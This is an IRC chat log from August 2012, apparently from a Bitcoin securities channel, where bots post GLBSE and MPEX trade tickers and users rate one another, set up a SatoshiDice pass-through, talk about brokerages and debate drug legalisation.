[-] Aug 25 18:34:01 oh well, that's why I don't do this kind of stuff, it takes too much time. Aug 25 18:34:18 we need more people doing it honestly. Aug 25 18:34:25 but if you want to get in you can prolly talk to smickles. Aug 25 18:35:20 I have Aug 25 18:35:30 [MPEX] [S.MPOE] 41979 @ 0.00037965 = 15.9373 BTC [-] Aug 25 18:36:02 as they say, the internet will rout around anything. Aug 25 18:36:07 +e Aug 25 18:36:15 [MPEX] [S.DICE] 2000 @ 0.0032 = 6.4 BTC [-] Aug 25 18:36:16 [GLBSE] [TYGRR.BOND-P] 5 @ 0.51000101 = 2.55 BTC [-] Aug 25 18:36:18 [GLBSE] [TYGRR.BOND-P] 1 @ 0.51 BTC [-] Aug 25 18:36:18 [GLBSE] [TYGRR.BOND-P] 8 @ 0.51 = 4.08 BTC [-] Aug 25 18:36:31 yes it will! Aug 25 18:37:34 I wonder if s.dice will sell out before 12 GMT Aug 25 18:38:06 ;;rated smickles Aug 25 18:38:07 You rated user smickles on Thu Jun 14 19:16:42 2012, giving him a rating of 3, and supplied these additional notes: He's been running MPOE.ETF and releasing THE monthly reports, a model for all Bitcoin financial reporting.. Aug 25 18:38:30 looks like it'll be close Aug 25 18:39:24 [GLBSE] [BIB.PIRATE] 2 @ 0.5501 = 1.1002 BTC [+] Aug 25 18:39:26 [GLBSE] [BIB.PIRATE] 48 @ 0.55 = 26.4 BTC [-] Aug 25 18:39:33 ;;rate smickles 4 He's been running MPOE.ETF and releasing THE monthly reports, a model for all Bitcoin financial reporting. Also handled k's of BTC as broker for various clients. Aug 25 18:39:34 Rating entry successful. Your rating for user smickles has changed from 3 to 4. Aug 25 18:39:54 [GLBSE] [GMVT-BOT] 5 @ 0.148 = 0.74 BTC [+] Aug 25 18:40:25 [GLBSE] [BIB.PIRATE] 2 @ 0.55 = 1.1 BTC [-] Aug 25 18:40:26 [GLBSE] [BIB.PIRATE] 18 @ 0.54 = 9.72 BTC [-] Aug 25 18:41:42 [GLBSE] [BIB.PIRATE] 2 @ 0.54 = 1.08 BTC [-] Aug 25 18:41:44 [GLBSE] [BIB.PIRATE] 5 @ 0.52 = 2.6 BTC [-] Aug 25 18:41:44 [GLBSE] [BIB.PIRATE] 13 @ 0.52 = 6.76 BTC [-] Aug 25 18:41:46 [GLBSE] [BIB.PIRATE] 7 @ 0.52 = 3.64 BTC [-] Aug 25 18:42:57 hmm, Aug 25 18:43:01 ;;rated mircea_popescu Aug 25 18:43:01 You rated user mircea_popescu on Thu Jun 14 19:21:33 2012, giving him a rating of 2, and supplied these additional notes: does a fine job at things. Aug 25 18:43:10 well that just seems out of date Aug 25 18:43:19 [GLBSE] [BIB.PIRATE] 16 @ 0.51 = 8.16 BTC [-] Aug 25 18:43:38 ;;rate mircea_popescu 3 runs MPEx, is open and honest Aug 25 18:43:39 Rating entry successful. Your rating for user mircea_popescu has changed from 2 to 3. Aug 25 18:44:48 [GLBSE] [BIB.PIRATE] 2 @ 0.5101 = 1.0202 BTC [+] Aug 25 18:44:50 [GLBSE] [BIB.PIRATE] 1 @ 0.51 BTC [-] Aug 25 18:45:10 https://glbse.com/asset/view/GMVT-BOT Aug 25 18:45:18 Could of been a good pick for you guys Aug 25 18:45:22 So sorry you didn't buy Aug 25 18:45:33 what is it ? Aug 25 18:45:41 Volatility bot on Mt. Gox Aug 25 18:45:46 that apparently "can't lose" Aug 25 18:46:09 a ok. Aug 25 18:47:06 lol Aug 25 18:47:11 I bought 250 shares o_o Aug 25 18:48:05 it doesn't stream ? Aug 25 18:48:11 Nefario is a hard worker Emmanuel. Tell me about your new issue :) Aug 25 18:50:10 [GLBSE] [TYGRR.BOND-P] 6 @ 0.51 = 3.06 BTC [-] Aug 25 18:50:11 [GLBSE] [TYGRR.BOND-P] 29 @ 0.45 = 13.05 BTC [-] Aug 25 18:52:21 [GLBSE] [TYGRR.BOND-P] 6 @ 0.45 = 2.7 BTC [-] Aug 25 18:53:00 [GLBSE] [GSDPT] 30 @ 0.004 = 0.12 BTC [-] Aug 25 18:54:01 I am back Aug 25 18:54:22 get your lesson from mircea_popescu Aug 25 18:54:27 Will do :) Aug 25 18:54:32 o hi DeaDTerra! Aug 25 18:54:38 you need to issue more shares omg! Aug 25 18:54:46 Sorry about all these delays..., Feels like everything goes to hell right now Aug 25 18:55:08 [GLBSE] [TYGRR.BOND-P] 10 @ 0.4 = 4 BTC [-] Aug 25 18:55:11 Will do :) Aug 25 18:55:15 usagi: It's on hiatus, considering he's changing up GLBSE. Aug 25 18:55:48 DeaDTerra: did you get your issues solved lastnight? Aug 25 18:56:16 [GLBSE] [OBSI.HRPT] 25 @ 0.10699999 = 2.675 BTC [-] Aug 25 18:56:18 MPex no, GLBSE Yes. I am getting the MPex resolved as we speak. Aug 25 18:56:29 Something tells me tonight is going to be a long night xD so much to do Aug 25 18:56:34 http://en.wikipedia.org/wiki/File:Vaux-le-Vicomte_01.jpg this is a decent little country cottage wouldn't you say. Aug 25 18:57:13 summer lovin Aug 25 18:57:15 had me a blast Aug 25 18:57:17 summer lovin Aug 25 18:57:19 happened so fast Aug 25 18:57:20 100,000 Shares up Aug 25 18:57:24 [GLBSE] [TYGRR.BOND-P] 10 @ 0.31000001 = 3.1 BTC [-] Aug 25 18:57:37 [GLBSE] [GSDPT] 970 @ 0.004 = 3.88 BTC [-] Aug 25 18:57:38 [GLBSE] [GSDPT] 100 @ 0.0038 = 0.38 BTC [-] Aug 25 18:57:40 [GLBSE] [GSDPT] 3243 @ 0.0037 = 11.9991 BTC [-] Aug 25 18:57:41 [GLBSE] [GSDPT] 10 @ 0.0035 = 0.035 BTC [-] Aug 25 18:57:42 [GLBSE] [GSDPT] 3000 @ 0.0035 = 10.5 BTC [-] Aug 25 18:57:42 [GLBSE] [GSDPT] 5000 @ 0.0035 = 17.5 BTC [-] Aug 25 18:57:44 [GLBSE] [GSDPT] 6294 @ 0.0034 = 21.3996 BTC [-] Aug 25 18:57:45 [GLBSE] [GSDPT] 2000 @ 0.0034 = 6.8 BTC [-] Aug 25 18:57:46 [GLBSE] [GSDPT] 3 @ 0.0033 = 0.0099 BTC [-] Aug 25 18:57:47 [GLBSE] [GSDPT] 5 @ 0.00321 = 0.0161 BTC [-] Aug 25 18:57:48 [GLBSE] [GSDPT] 79375 @ 0.0032 = 254 BTC [-] Aug 25 18:57:50 mircea_popescu: haha, nice shack! Aug 25 18:58:10 !ticker GSDPT Aug 25 18:58:22 DeaDTerra seems you need more out. Aug 25 18:58:25 [GLBSE:GSDPT] [Bid: 0.004] [Ask: 0.0065] [Spread: 0.0025] [Last: 0.0032] [24hVol: 250.806703] [7dAvg: 0.00445071] Aug 25 18:59:10 ;;ticker Aug 25 18:59:10 Best bid: 10.50001, Best ask: 10.55, Bid-ask spread: 0.04999, Last trade: 10.50001, 24 hour volume: 95480, 24 hour low: 9.9, 24 hour high: 10.62611 Aug 25 19:00:18 More then 100,000 ? Aug 25 19:00:27 okay let me buy the shares on MPEX first Aug 25 19:00:35 I don't want to end up oweing people shares and shit Aug 25 19:01:57 seems the bid is still 40 not 32 or 34. but yea, prolly wise to buy first s.dice then issue more. Aug 25 19:02:01 [GLBSE] [TYGRR.BOND-P] 1 @ 0.405 BTC [+] Aug 25 19:06:20 [GLBSE] [DMC] 21 @ 0.06 = 1.26 BTC [-] Aug 25 19:06:21 [GLBSE] [DMC] 25 @ 0.07 = 1.75 BTC [+] Aug 25 19:06:22 [GLBSE] [DMC] 25 @ 0.08 = 2 BTC [+] Aug 25 19:06:24 [GLBSE] [DMC] 25 @ 0.09 = 2.25 BTC [+] Aug 25 19:06:25 [GLBSE] [DMC] 24 @ 0.1 = 2.4 BTC [+] Aug 25 19:06:57 man, people just get things wrong way too often https://bitcointalk.org/index.php?topic=101902.msg1131185#msg1131185 Aug 25 19:07:28 !ticker gsdpt Aug 25 19:07:32 [GLBSE:GSDPT] [Bid: 0.0034] [Ask: 0.0065] [Spread: 0.0031] [Last: 0.0032] [24hVol: 577.326353] [7dAvg: 0.00425358] Aug 25 19:07:32 !ticker s.dice Aug 25 19:07:33 [MPEX:S.DICE] 1day: 0.0032 / 0.00320203 / 0.003232 (1621087 shares, 5,190.78 BTC), 30day: 0.0032 / 0.00320203 / 0.003232 (1621087 shares, 5,190.78 BTC) Aug 25 19:07:45 chill people moe share will be sold soon xD Aug 25 19:08:09 smickles what nao ? Aug 25 19:08:10 heh, i'm not part of that flam war DeaDTerra Aug 25 19:08:37 well, given that all the GLBSE volume has to go through MPEX, it would be pretty hard for the GLBSE number to be anywhere close to the MPEX one. unpossible even. Aug 25 19:08:46 mircea_popescu: this guy said that things were playing out as he predicted, an arb op because the demand would be higher on glbse than mpex Aug 25 19:09:02 o. mmkay. Aug 25 19:09:23 ColdHardMetal: i would give the benifit of the doubt and think that we would exclude passthru volume from the mpex 'score' Aug 25 19:09:36 [GLBSE] [BITCOINRS] 4 @ 0.051 = 0.204 BTC [+] Aug 25 19:10:00 ColdHardMetal so far glbse volume is technically not in mpex because we're only now working with DeaDTerra to get him through Aug 25 19:10:08 also, this situation calls for an examination of the passthru bids too because there weren't enough available at the time Aug 25 19:10:10 after some of what I've seen in that thread I'm not sure I'd give anyone the benefit of anything lol Aug 25 19:10:11 why are people so obsessed about keeping score anyway Aug 25 19:10:21 there were supply problems on that side which distorted the true volume tho. Aug 25 19:10:51 bitfoo: well, in my case, this was an easily ascertainable fact Aug 25 19:10:54 I fucked up sorry. Now I am trying to fix it oki :) Aug 25 19:11:05 relax dt, will be fine soonish Aug 25 19:11:06 DeaDTerra: it's nothing against you Aug 25 19:11:08 :) Aug 25 19:11:14 you're in time to get this batch and everything. Aug 25 19:11:39 .py 0.00320000 * 378913 Aug 25 19:11:40 1212.5216 Aug 25 19:11:49 Indeed, but I am a bit annoyed at myself as I had planned to do it last night. Then things went wrong, then the same this morining :P Aug 25 19:11:53 there's plenty of room there for the ~500 btc glbse volume so far, so. Aug 25 19:11:53 not my style to be late. Aug 25 19:12:38 DeaDTerra i'd say no permanent damage done, really. some people overpaid on glbse, but mmm... well... i guess their bad really. Aug 25 19:12:42 well, DeaDTerra, not just taking the btc and running helps you out goodwill Aug 25 19:12:57 what do you plan to do now tho ? increase holdings factor ? or ? Aug 25 19:13:03 er, helps out with goodwill Aug 25 19:13:31 I plan to purchase shares to backup the shares already released then, sell more shares and repeat Aug 25 19:13:36 until theres no more demand/supply Aug 25 19:13:37 works. Aug 25 19:13:57 [GLBSE:GSDPT] [Bid: 0.0034] Aug 25 19:13:57 I could throw in some of my money to the backing but I am worried that will start messing up my numbers xD Aug 25 19:14:00 you need to sell moar tho. Aug 25 19:14:34 there's about 147k in bids Aug 25 19:14:54 [GLBSE] [BIB.PIRATE] 10 @ 0.51 = 5.1 BTC [-] Aug 25 19:15:21 (bids at or above .0032) Aug 25 19:15:36 . 0.0032 * 147000 Aug 25 19:15:39 .py 0.0032 * 147000 Aug 25 19:15:40 470.4 Aug 25 19:15:47 seems it'll very close sell out. Aug 25 19:16:07 [MPEX] [S.DICE] 15000 @ 0.0032 = 48 BTC [-] Aug 25 19:16:43 Indeed Aug 25 19:17:33 !ticker S.DICE Aug 25 19:17:34 [MPEX:S.DICE] 1day: 0.0032 / 0.00320201 / 0.003232 (1636087 shares, 5,238.78 BTC), 30day: 0.0032 / 0.00320201 / 0.003232 (1636087 shares, 5,238.78 BTC) Aug 25 19:17:57 DeaDTerra: what are you doing with the extra btc from the people who paid > .0032? Aug 25 19:18:57 Keep for myself :) Aug 25 19:19:07 They will be used to pay fees and such. Aug 25 19:19:13 and how do you maintain 1:1 with the glbse seller's fees? Aug 25 19:19:40 I will put in money myself if I notice that BTC are missing Aug 25 19:19:49 The fee is pretty small so it shouldn't be too much of a problem Aug 25 19:19:52 o that's a point, he gets free buys on mpex but he pays what, .5 on glbse ? Aug 25 19:20:02 .5% Aug 25 19:20:03 you're looking at ~5btc per 1k Aug 25 19:20:10 once he does over Xbtc in sales Aug 25 19:20:15 i guess you recoup on the first 1k worth of dividends Aug 25 19:20:20 (i can't remember the value) Aug 25 19:20:44 I am not doing this to make money, I am doing it as a service to support the community and Eric+SatoshIDice :) Aug 25 19:20:52 I don't really care much if I brake even or not. Aug 25 19:21:06 it wouldn't be a huge sum in any event. Aug 25 19:21:09 i do think that putting you own btc in isn't cricket, it should at least be a loan to the passthru Aug 25 19:21:56 even an interest free loan, as i have tended to do with the things i'm involved in Aug 25 19:22:58 maybe you two should work together on making the reports for this thing Aug 25 19:25:23 [MPEX] [F.GIGA.ETF] 15083 @ 0.00102089 = 15.3981 BTC [+] Aug 25 19:25:26 I guess :) Aug 25 19:25:39 But how would I pay it back? Like during the next dividend? Aug 25 19:25:50 Currently waiting on my deposit to his the exchange :) Aug 25 19:26:01 Already tried to send in a buy order and it works, so I am all good on that part. Aug 25 19:26:31 [MPEX] [F.GIGA.ETF] 16837 @ 0.00099725 = 16.7907 BTC [-] Aug 25 19:26:32 [MPEX] [F.GIGA.ETF] 11100 @ 0.0009875 = 10.9613 BTC [-] Aug 25 19:26:34 [MPEX] [F.GIGA.ETF] 9563 @ 0.00097147 = 9.2902 BTC [-] Aug 25 19:27:28 DeaDTerra so is it hard ? Aug 25 19:27:35 (once you learn how to do it i mean :p ) Aug 25 19:27:38 ehm no. Aug 25 19:28:02 I mean learning it is hard, and I think that the FAQ might need to be more specific for retards like me. But other then that it's not that hard. Aug 25 19:28:21 It's a bit time consuming but once you get the script I guess it will be a lot faster Aug 25 19:28:42 my guess is that as more people get familiar with it that are also not anon sociopaths, but pariticpate in communities etc Aug 25 19:28:49 it will become sorta common knowledge Aug 25 19:29:41 :) Aug 25 19:30:46 also, there is a need for brokerages Aug 25 19:30:47 Comeone GLBSE you can do it, send the withdraw :D Aug 25 19:30:50 [GLBSE] [GIGAMINING] 1 @ 0.98121111 BTC [-] Aug 25 19:30:58 then people can stop complaining about why all the stocks are not on their favorite exchange Aug 25 19:31:16 [GLBSE] [GIGAMINING] 1 @ 0.98121111 BTC [-] Aug 25 19:31:22 [GLBSE] [GIGAMINING] 1 @ 0.98121111 BTC [-] Aug 25 19:31:27 i think actually being a broker is the next revenue generator for btc Aug 25 19:31:33 so far we've had scammer and fund manager Aug 25 19:31:37 lol Aug 25 19:31:39 I will start working on the other stuff I need to do mean while :) Aug 25 19:32:12 I know people that have already made a lot from brokering (not sure how to bend it) and underwritings. Aug 25 19:32:13 [GLBSE] [GIGAMINING] 1 @ 0.98121111 BTC [-] Aug 25 19:32:18 Bulk orders and then resaling and such. Aug 25 19:32:31 I am going to be starting up some other pass throughs and also launch GBF on GLBSE :) Aug 25 19:32:59 I am working on a full redesign of the GBF system as it has to many flaws, it was fine when I worked with small amounts of investors, but it is not optimal right now Aug 25 19:33:09 DeaDTerra: yeah, pay for it as expenses out of dividend receipts, unless your contract forbids it Aug 25 19:33:49 Can't do that Aug 25 19:34:06 I wrote the contract in a way so that I Can't do that :P Aug 25 19:34:35 [GLBSE] [GIGAMINING] 1 @ 0.98111111 BTC [-] Aug 25 19:35:06 < bitfoo> also, there is a need for brokerages <<< i keep hearing this, and as i am performing this service, and working on a good web interface for it, i feel like these sort of statements are sorta like "hurry up and finish the web ui smikles" Aug 25 19:35:27 [GLBSE] [GIGAMINING] 1 @ 0.98111111 BTC [-] Aug 25 19:35:43 What will the site involve? Aug 25 19:35:50 what will your brokage ? Aug 25 19:36:00 [GLBSE] [GIGAMINING] 1 @ 0.966 BTC [-] Aug 25 19:36:40 i will provider for people who want to buy and sell mpex listings (mpex at first, others as well, but later) Aug 25 19:37:02 okay cool Aug 25 19:37:38 it will be a simple interface for ease of use, but secure first Aug 25 19:38:00 smickles: i updated your wot rating Aug 25 19:38:06 ;;rated smickles Aug 25 19:38:06 You rated user smickles on Sat Aug 25 09:37:02 2012, giving him a rating of 3, and supplied these additional notes: Runs MPOE.ETF and S^2CM on GLBSE, runs a brokerage service for MPEX. We have at least 1 OTC trade under our belt. Aug 25 19:38:10 I have been thinking of starting pass throughs to some known lenders/investment sites. So that people can for example invest in a 90 Day bond for 1 BTC, then they get a daily dividend paid by me and they can liquidate when ever they want. Aug 25 19:38:12 i'll have the buy and sell buttons that many seem to want Aug 25 19:38:13 [MPEX] [S.MPOE] 4100 @ 0.0003781 = 1.5502 BTC [-] Aug 25 19:38:16 smickles, consider the statement as encouragement. :) Aug 25 19:38:22 ooh, thank you mod6 Aug 25 19:38:36 rg, i figured it was time that I put in a rating too Aug 25 19:38:42 ;;rated rg Aug 25 19:38:42 You rated user rg on Sat Aug 25 09:26:21 2012, giving him a rating of 3, and supplied these additional notes: Runs BitVPS.com. Always helpful to clients and new guys on OTC. Diligently pays dividends every month!. Aug 25 19:38:54 ;;rated rg Aug 25 19:38:54 You rated user rg on Sun May 27 11:43:46 2012, giving him a rating of 2, and supplied these additional notes: None. Aug 25 19:40:10 [GLBSE] [TYGRR.BOND-P] 1 @ 0.5499 BTC [+] Aug 25 19:40:11 [GLBSE] [BITCOINMINV] 3 @ 0.122 = 0.366 BTC [-] Aug 25 19:40:13 [GLBSE] [BITCOINMINV] 10 @ 0.126 = 1.26 BTC [+] Aug 25 19:40:14 [GLBSE] [BITCOINMINV] 6 @ 0.129 = 0.774 BTC [+] Aug 25 19:41:02 [GLBSE] [BITCOINMINV] 25 @ 0.13 = 3.25 BTC [+] Aug 25 19:42:29 ;;tslb Aug 25 19:42:32 Time since last block: 1 minute and 51 seconds Aug 25 19:43:18 [GLBSE] [BITCOINMINV] 5 @ 0.13 = 0.65 BTC [+] Aug 25 19:43:21 [MPEX] [S.MPOE] 12100 @ 0.0003781 = 4.575 BTC [-] Aug 25 19:43:23 [MPEX] [S.MPOE] 37500 @ 0.00037663 = 14.1236 BTC [-] Aug 25 19:47:36 [GLBSE] [BIB.PIRATE] 6 @ 0.51 = 3.06 BTC [-] Aug 25 19:47:43 [GLBSE] [PUREMINING] 15 @ 0.0893 = 1.3395 BTC [-] Aug 25 19:47:45 [GLBSE] [PUREMINING] 25 @ 0.0892 = 2.23 BTC [-] Aug 25 19:47:46 [GLBSE] [PUREMINING] 2 @ 0.089 = 0.178 BTC [-] Aug 25 19:47:47 [GLBSE] [PUREMINING] 10 @ 0.076 = 0.76 BTC [-] Aug 25 19:47:49 [GLBSE] [PUREMINING] 35 @ 0.075 = 2.625 BTC [-] Aug 25 19:47:50 [GLBSE] [PUREMINING] 2 @ 0.072 = 0.144 BTC [-] Aug 25 19:47:51 [GLBSE] [PUREMINING] 14 @ 0.071 = 0.994 BTC [-] Aug 25 19:47:51 [GLBSE] [PUREMINING] 14 @ 0.07 = 0.98 BTC [-] Aug 25 19:48:17 still no dough from pirate huh. Aug 25 19:48:32 [MPEX] [S.DICE] 156875 @ 0.0032 = 502 BTC [-] Aug 25 19:48:52 156875 purchased Aug 25 19:49:09 nice. Aug 25 19:49:13 now go sell moar lol Aug 25 19:49:40 [GLBSE] [FOO.PPPPT] 5 @ 0.51 = 2.55 BTC [-] Aug 25 19:50:37 [GLBSE] [GSDPT] 900 @ 0.0034 = 3.06 BTC [+] Aug 25 19:50:38 [GLBSE] [GSDPT] 46625 @ 0.0032 = 149.2 BTC [-] Aug 25 19:50:40 [GLBSE] [GSDPT] 2000 @ 0.0032 = 6.4 BTC [-] Aug 25 19:55:52 [MPEX] [S.MPOE] 23874 @ 0.00037663 = 8.9917 BTC [-] Aug 25 19:55:54 [MPEX] [S.MPOE] 28126 @ 0.00037516 = 10.5518 BTC [-] Aug 25 19:55:56 Hm I had to put in 20 more BTC to cover the GLBSE fees :( Aug 25 19:56:01 this seems to be a expensive IPO xD Aug 25 19:56:44 20 btc ?! Aug 25 19:56:47 yep Aug 25 19:57:08 !ticker gsdpt Aug 25 19:57:09 I did the calculations I was 20 BTC for the sign up fee + 22 or something like that short. Aug 25 19:57:37 [GLBSE:GSDPT] [Bid: 0.0001] [Ask: 0.0032] [Spread: 0.0031] [Last: 0.0032] [24hVol: 735.986353] [7dAvg: 0.00420071] Aug 25 19:57:45 .py 22/ 735.986353 Aug 25 19:57:45 0.0298918586062 Aug 25 19:57:49 oh well :P I will go and cry on the forums for donations :P Aug 25 19:57:50 this can not be, 3% ? Aug 25 19:58:04 Probably something wrong with my calculations. Aug 25 19:58:06 I guess Aug 25 19:58:32 I did total amount of shares bought + total amount of shares I can afford buying with the amount in my GLBSE account+ shares not yet issued Aug 25 19:58:54 then I took 300,000 (amount issued so far) and minus that amount then times by 0.0032 Aug 25 19:59:32 nvm xD Aug 25 19:59:39 hahah I can't count... Aug 25 19:59:54 hahaha wow I am going for a glass of water brb Aug 25 20:01:42 [GLBSE] [GSDPT] 5000 @ 0.0034 = 17 BTC [+] Aug 25 20:03:43 look assbot still says there's demand Aug 25 20:03:53 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Aug 25 20:05:47 [GLBSE] [TYGRR.BOND-P] 1 @ 0.5445 BTC [-] Aug 25 20:05:49 [GLBSE] [TYGRR.BOND-P] 1 @ 0.54495 BTC [+] Aug 25 20:05:49 [GLBSE] [TYGRR.BOND-P] 2 @ 0.545 = 1.09 BTC [+] Aug 25 20:06:44 [GLBSE] [GSDPT] 5000 @ 0.0034 = 17 BTC [+] Aug 25 20:09:29 I am back Aug 25 20:09:33 Evorhees :D Aug 25 20:09:34 Hi :) Aug 25 20:09:51 Situation is under controll, really sorry that it became such a mess :( Fuck up from my part. Aug 25 20:10:00 What's a mess Aug 25 20:10:17 I planeed to fix the backings + sell the shares yesterday Aug 25 20:10:28 [GLBSE] [PUREMINING] 15 @ 0.065 = 0.975 BTC [-] Aug 25 20:10:29 hello evoorhees Aug 25 20:10:50 Well hopefully you will make enough from this to float again hehe Aug 25 20:10:51 GLBSE bugged up and I had to go to bed, I then tried to redeme myself this morning but I only had an hour and as I didn't fully master MPex I didn't manage to get the backing up and I didn't place enough asks. Aug 25 20:11:12 So how many discount shares can you get me :> Aug 25 20:11:16 [GLBSE] [TYGRR.BOND-P] 1 @ 0.545 BTC [+] Aug 25 20:11:22 I will, I have asked to go down in hours and I will probably quit if I need more time. Aug 25 20:11:26 [GLBSE] [GSDPT] 500 @ 0.0034 = 1.7 BTC [+] Aug 25 20:11:28 None it's a pass though xD Aug 25 20:11:31 heya rothgar Aug 25 20:11:45 I don't get a hello ;( xD Aug 25 20:11:48 :) Aug 25 20:11:52 What do you mean go down in hours, at your job? Aug 25 20:11:59 Yes :) Aug 25 20:12:01 If you do this right, it becomes your job Aug 25 20:12:08 I know xD Aug 25 20:12:30 I make more an hour doing bitcoin stuff then I do my regular job :P, so I will probably quit it soon anyways Aug 25 20:12:49 [GLBSE] [GSDPT] 5000 @ 0.0034 = 17 BTC [+] Aug 25 20:12:59 DeaDTerra, yes join the agora Aug 25 20:13:14 haha Aug 25 20:13:31 not only is it the more moral economy, but it pays better ;) Aug 25 20:13:48 :) :) Aug 25 20:13:59 evoorhees: comfortable on your pile of money? Aug 25 20:14:14 [GLBSE] [OBSI.HRPT] 60 @ 0.1021 = 6.126 BTC [-] Aug 25 20:14:16 [GLBSE] [OBSI.HRPT] 10 @ 0.1021 = 1.021 BTC [-] Aug 25 20:14:19 hahahhaha xD Aug 25 20:14:22 What's a pile of btc look like? Aug 25 20:14:51 If you have time to listen to some music http://www.tagtele.com/videos/voir/31694/1/ Aug 25 20:14:59 we'll see how the rest of the offering goes nefario :) Aug 25 20:15:03 english Aug 25 20:15:10 you know bitcoin are like pokemon, gotta catch 'em all Aug 25 20:15:15 HAHAHH xD Aug 25 20:15:16 you might need an oxygen mask though Aug 25 20:15:24 with how high you'll get Aug 25 20:15:37 oh you think I'd spend the money at silk road? :) Aug 25 20:15:50 no I was talking about altitude Aug 25 20:15:52 yea, I feel that the 5M will be a slow sell but eventually it will sell Aug 25 20:15:59 from a tall pile of moonay Aug 25 20:16:13 I think you should invest it in say a good fund, hmm I mean Gamma... hm yea a fund maybe :P Aug 25 20:16:27 Nah if I would get that much BTC, I would sell of part of it the other I would place in a offline wallet Aug 25 20:16:28 The GLBSE startup fund Aug 25 20:16:43 most of it is def going in an offline wallet, safe and sound Aug 25 20:16:48 see Aug 25 20:16:51 Evorhees=pirate omg! Aug 25 20:16:53 pile of money Aug 25 20:17:02 put it on a usb Aug 25 20:17:03 then Aug 25 20:17:05 in a sock Aug 25 20:17:06 I doubt more than 5% of the pile will be sold for fiat Aug 25 20:17:40 though, I heard about an awesome casino game called satoshiDICE so I might spend it all there Aug 25 20:18:01 evoorhees: did you get pympex working yestreday? mircea was asking but I was sick so wasn't very useful Aug 25 20:18:08 all on red please *puts 5 mill on the table* *pokerface* Aug 25 20:18:19 yeah I used pympex Aug 25 20:18:24 I go manually :P Aug 25 20:18:29 cool :) Aug 25 20:18:31 you know, I never even used the command line before bitcoin stuff Aug 25 20:18:33 no not really Aug 25 20:18:34 it's a new world to me Aug 25 20:18:40 I just couldn't get it to owkr Aug 25 20:18:45 same for me :P Aug 25 20:19:32 hm with all this chaos I have forgotten to go poke on Alberto and JRO xD Aug 25 20:20:44 not only is it the more moral economy, but it pays better ;) << this Aug 25 20:20:53 sadly not true for many of the people btc really needs tho. Aug 25 20:21:54 [GLBSE] [GIGAMINING] 4 @ 0.98439 = 3.9376 BTC [+] Aug 25 20:21:56 [GLBSE] [GIGAMINING] 2 @ 0.98449 = 1.969 BTC [+] Aug 25 20:21:59 NYAN.B is doing very well, thank god. It's already covered this week's div for A and B all by itself with leftovers for C Aug 25 20:22:14 usagi still nothing from pirate i take it ? Aug 25 20:22:20 I could probably be performing very well, but I need more time and money. Aug 25 20:22:46 I like the seeming silence Aug 25 20:22:54 of pirates defenders Aug 25 20:22:54 I am thinking of doing a deposit campaign again. Though I need to clear my portfolio of a couple of assets that I need to get rid off before I launch another campaign. Aug 25 20:23:10 no more pass throughs on GLBSE Aug 25 20:23:11 Yea :( Aug 25 20:23:16 for the pirate sort of thing Aug 25 20:23:19 Pirate is really full of crap either way. Aug 25 20:23:24 a very good ideea that nefario. Aug 25 20:23:41 it's done a lot of damage to the bitcoin economy IMO Aug 25 20:23:53 and has a destabilising effect on the market Aug 25 20:23:57 GLBSE included Aug 25 20:24:04 its like Aug 25 20:24:14 it's the distortion of expected returns that I think has been the worst thing. Aug 25 20:24:15 legalising heroin Aug 25 20:24:20 ja Aug 25 20:25:01 ok if you legalised heroin you'd make a lot off tax Aug 25 20:25:10 No nothing from pirate yet :/ Aug 25 20:25:12 but then everyone is a heroin addict Aug 25 20:28:15 nefario not everyone Aug 25 20:28:44 well ok Aug 25 20:28:59 those who have heroin allergies wont Aug 25 20:29:21 nefario : absolutely, very true. Aug 25 20:29:36 [GLBSE] [ASICMINER] 2 @ 0.0899 = 0.1798 BTC [+] Aug 25 20:30:15 running an exchange is certainly a responsability among other things. Aug 25 20:31:20 [GLBSE] [CPA] 3 @ 0.08 = 0.24 BTC [-] Aug 25 20:32:15 nefario those with half a brain won't Aug 25 20:32:45 I won't and I think it's cynical to say that I will. Aug 25 20:33:00 [GLBSE] [CPA] 2 @ 0.0989 = 0.1978 BTC [+] Aug 25 20:33:22 Rothgar still, the argument can be brought, it's immoral to leave a sharp pitchfork in the grass. Aug 25 20:33:35 [GLBSE] [TYGRR.BOND-A] 190 @ 0.1 = 19 BTC [+] Aug 25 20:34:01 Is it immoral to NOT search every field for pitchforks? Aug 25 20:34:50 that, no. Aug 25 20:34:56 quite the contrary i'd say. Aug 25 20:36:09 [GLBSE] [THUNDERCM.MIF.SHARES] 5 @ 0.4207 = 2.1035 BTC [-] Aug 25 20:36:11 ;;tslb Aug 25 20:36:19 Time since last block: 11 minutes and 53 seconds Aug 25 20:36:28 Rothgar: even if you didn't it would still hurt you Aug 25 20:36:40 heroin addicts steal Aug 25 20:36:51 and effect people other than themselves Aug 25 20:36:54 Your argument is an argument not to sell heroin in your store. It doesn't justify breaking into people's homes to justify heroin Aug 25 20:37:09 They would steal less if heroin was legal, lower price. Aug 25 20:37:43 and the laws do nothing to prevent people form stealing Aug 25 20:37:45 Rothgar hard to know what would be if. Aug 25 20:38:06 It would be like before 197-something Aug 25 20:38:13 [MPEX] [S.DICE] 71528 @ 0.0032 = 228.8896 BTC [-] Aug 25 20:38:40 [GLBSE] [THUNDERCM.MIF.SHARES] 5 @ 0.4314 = 2.157 BTC [+] Aug 25 20:38:49 1870 you mean ? Aug 25 20:39:03 No drug laws started in the 1970's Aug 25 20:39:25 really? Aug 25 20:39:32 im pretty sure heroin was made illegal before alcohol in the us Aug 25 20:39:44 but not the UK :p Aug 25 20:39:50 lol k Aug 25 20:39:50 mircea_popescu: are you fucking kidding me? Aug 25 20:39:54 Diablo-D3 no ? Aug 25 20:40:19 1970 Aug 25 20:40:19 Comprehensive Drug Abuse Prevention and Control Act of 1970 (Controlled Substance Act of 1970)-- Aug 25 20:40:35 ya but Aug 25 20:40:41 that's not the first, it's just the last. Aug 25 20:40:49 what Rothgar said Aug 25 20:41:30 In 1924, the United States Congress banned its sale, importation or manufacture Aug 25 20:41:41 1830's Aug 25 20:41:41 In Massachusetts, first law to limit alcohol availability in U.S.-- forbade selling to Indians. Aug 25 20:41:41 [GLBSE] [PUREMINING] 3 @ 0.09989 = 0.2997 BTC [+] Aug 25 20:41:59 mkay, well, im not really an expert on the matter Aug 25 20:42:07 howdy Aug 25 20:42:07 Anyway 1970 was the year drugs were banned Aug 25 20:42:08 mircea_popescu got pwned. Aug 25 20:42:16 hello bearbones Aug 25 20:42:18 heya. Aug 25 20:42:40 mircea, I head you run mpex. is that true? Aug 25 20:42:49 yes. Aug 25 20:42:52 [MPEX] [S.MPOE] 27146 @ 0.00037524 = 10.1863 BTC [+] Aug 25 20:43:03 mircea_popescu: you do?! Aug 25 20:43:07 d'oh ? Aug 25 20:43:11 